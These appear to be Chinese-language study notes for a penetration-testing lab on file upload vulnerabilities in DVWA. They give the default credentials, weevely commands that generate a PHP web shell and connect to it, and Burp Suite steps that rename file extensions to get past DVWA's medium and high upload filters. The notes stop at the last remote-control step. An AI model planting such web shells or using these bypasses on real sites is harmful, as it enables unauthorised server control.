文件上传
1. DVWA
- 默认登入帐号密码 admin password
- DVWA 修改安全等级 在DVWA Security 中选择然后submit
2. 工具 weevely
-
生成shell.php
weevely generate 123456 /home/kali/shell.php
在/home/kali/下生成shell.php文件,设置密码为123456 -
在DVWA中上传shell.php
-
远程控制
weevely http://192.168.1.104/dvwa/hackable/uploads/shell.php 123456
3. 拦截请求 Intercepting HTTP Requests
- 工具 Burp Suite
- 在浏览器设置代理模式,网络设置的ip与端口与Burp Suite中proxy–options–proxy listeners的ip和端口一直
- 使用完Burp Suite后,将浏览器的代入模式关闭
4. 使用高级文件上传漏洞 Exploiting Advanced File Upload Vulnerabilities To Hack Websites
- 设置DVWA安全模式为medium(此时DVWA无法直接上传php文件)
- 借助Burp Suite
- 将php后缀改为jpg,然后上传
- 在Burp Suite中截获请求,将Burp Suite中proxy–intercept–intercept is on下面的Content-Disposition: form-data; name=“uploaded”; filename="shell 2.jpg"中shell 2.jpg改为shell 2.php
- 远程控制
weevely http://192.168.1.104/dvwa/hackable/uploads/shell2.php 123456
5. 利用更多高级文件上传漏洞 Exploiting More Advanced File Upload Vulnerabilities
- 设置DVWA安全模式为high
- 在Burp Suite中将shell3.jpg改为shell3.php.jpg
- 远程控制